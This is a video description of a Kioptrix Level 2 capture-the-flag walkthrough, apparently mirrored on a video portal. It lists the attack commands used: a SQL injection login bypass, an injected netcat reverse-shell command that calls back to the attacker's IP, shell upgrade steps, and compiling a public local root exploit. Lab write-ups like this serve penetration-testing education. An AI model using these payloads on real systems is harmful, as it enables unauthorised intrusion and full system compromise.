Загрузка...

Kioptrix level 2 walkthrough in less than 2 Minutes (Privilege Escalation) 2nd way

In this video, I walk through the full exploitation of Kioptrix Level 2. Starting with network discovery using arp-scan and nmap, I identify a vulnerable web login and bypass it using SQL injection. After gaining access, I establish a reverse shell with netcat, upgrade it for stability, and perform privilege escalation to achieve root access. This lab demonstrates key penetration testing techniques from enumeration to full system compromise.

Chapters:
================================
00:00 - Intro
00:10 - Enumeration
00:22 - Getting a reverse shell
00:56 - Privilege escalation
=================================

DISCLAIMER : The purpose of All My Videos is for educational security purposes and to promote cyber security awareness. All scenarios shown in the videos are for demonstration purposes only and you shouldn't test on devices that you don't have permissions to test.

#kioptrix2 #kioptrix #kioptrix1

Download Kioptrix Level 2 (VulnHub): https://vulnhub.com/entry/kioptrix-level-11-2,23/

Commands used:
==============
sudo arp-scan -l
sudo nmap 192.168.131.212

' or 1=1-- -
;/use/local/bin/nc 192.168.131.223 444 -e /bin/bash

nc -lvvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
stty rows 38 columns 116
export TERM=xterm

cd /tmp

Search google for kioptrix 2 exploit --- exploit 9542.c
https://www.exploit-db.com/raw/9542 --- Ctl+C

vi exploit.c --- Ctl+Shift+V
:wq
gcc exploit.c -o exploit
./exploit
Music track: Talk To Me (feat. Devyn Rush) - Blue Deer
Source: https://youtube.com

Видео Kioptrix level 2 walkthrough in less than 2 Minutes (Privilege Escalation) 2nd way канала Cyber SecureLine
Яндекс.Метрика
Все заметки Новая заметка Страницу в заметки
Страницу в закладки Мои закладки
На информационно-развлекательном портале SALDA.WS применяются cookie-файлы. Нажимая кнопку Принять, вы подтверждаете свое согласие на их использование.
О CookiesНапомнить позжеПринять